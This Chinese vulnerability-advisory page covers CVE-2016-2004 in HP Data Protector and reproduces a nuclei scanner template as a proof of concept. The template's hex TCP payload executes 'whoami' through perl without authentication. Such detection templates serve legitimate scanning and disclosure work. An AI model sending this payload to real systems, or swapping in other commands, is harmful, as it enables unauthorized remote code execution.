HP Data Protector Arbitrary Command Execution Vulnerability

漏洞信息

漏洞名称: HP Data Protector Arbitrary Command Execution Vulnerability

漏洞编号:

  • CVE: CVE-2016-2004

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: HP Data Protector是一款企业级的数据备份和恢复软件,广泛用于各种规模的组织中,以保护关键数据免受丢失或损坏。由于其广泛的应用,该软件的安全问题可能影响到大量的企业和机构。此次漏洞属于命令执行类型,其技术根源在于软件中存在未修复的认证缺失问题,这是对之前CVE-2014-2623漏洞的不完全修复。攻击者可以通过未指定的向量远程执行任意代码,利用此漏洞无需任何形式的认证,使得攻击门槛极低。成功利用此漏洞的攻击者可以以Data Protector服务账户的权限执行任意命令,可能导致数据泄露、服务中断,甚至完全控制系统。由于漏洞的严重性和易利用性,它被评定为严重级别。建议所有使用受影响版本的用户立即升级到最新版本,以避免潜在的安全风险。

产品厂商: HP

产品名称: Data Protector

影响版本: before 7.03_108, 8.x before 8.15, and 9.x before 9.06

来源: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/network%2Fcves%2F2016%2FCVE-2016-2004.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x, NaN-KoreLogic
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    epss-score: 0.92734
    epss-percentile: 0.99751
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: data_protector
  tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex
    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 490a0046304402205cb8d4fc530d3448a6fd8ee810f0c3ebf70d1061fecfe0c5b61fcdb60c0f055c02200ddf9aa8fc1921d76c065889e43a4401a29dd6de877e348916bcf601ecfef8bc:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
HP Data Protector Arbitrary Command Execution Vulnerability
http://example.com/2025/07/06/github_2863097029/
作者
lianccc
发布于
2025年7月6日
许可协议